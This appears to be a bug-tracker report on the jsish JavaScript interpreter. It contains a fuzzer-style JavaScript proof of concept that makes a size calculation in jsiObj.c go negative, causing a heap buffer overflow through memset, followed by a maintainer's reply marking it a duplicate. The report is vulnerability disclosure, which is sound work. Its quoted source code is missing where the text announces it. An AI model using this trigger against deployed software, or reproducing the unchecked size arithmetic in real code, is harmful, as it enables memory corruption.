integer overflow and buffer overflow

[bird8693]

Enviroment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1 

poc:

var o = [
    1,
    2
];
o, 90040991;
var ExBs = new RegExp('>l1Pq4Q~R$!');
ExBs = o.reverse();
ExBs.length = ~3037000498;
var zaCp = o.unshift(o.length, o, ExBs.lastIndex, o);
var FfYD = new RegExp('@OsH');
o = o.constructor();
var yfSi = new Map([
    [
        1,
        1200,
        o.length,
        ExBs.lastIndex
    ],
    [
        o,
        ExBs,
        o,
        0,
        -Infinity,
        -Infinity
    ]
]);
var YAjm = yfSi.keys();
var QkwQ = new RegExp('GBY');
var dPft = new Map([
    [
        -2147483648,
        FfYD.lastIndex,
        FfYD,
        3037000498,
        0.1,
        ExBs.length,
        FfYD,
        2147483649
    ],
    [
        ExBs,
        FfYD.lastIndex,
        -9007199254740994
    ]
]);
var fjNQ = o.indexOf(0.2, function () {
});
var a = Object.keys(o);
var APSB = -9007199254740990 != a.length;
var wCMe = new WeakSet([]);

vulnerability description:

The code that generated the vulnerability is on line src / jsiObj.c: 428, the code is as follows:

lenis the length of the Array, and the PoC is initially set to a maximum value by o.length. After the calculation of the code, nsiz is calculated as a negative number, which can bypass the two checks of line 421 and line 425.
The affected code is as follows:

obj-> arr will get a smaller size of heap space, and then memset assigns a value to the space pointed to by obj-> arr + obj-> arrMaxSize, but this time has exceeded the actual heap range of obj-> arr, causing heap overflow .

[pcmacdon]

Appears to be a duplicate of #5.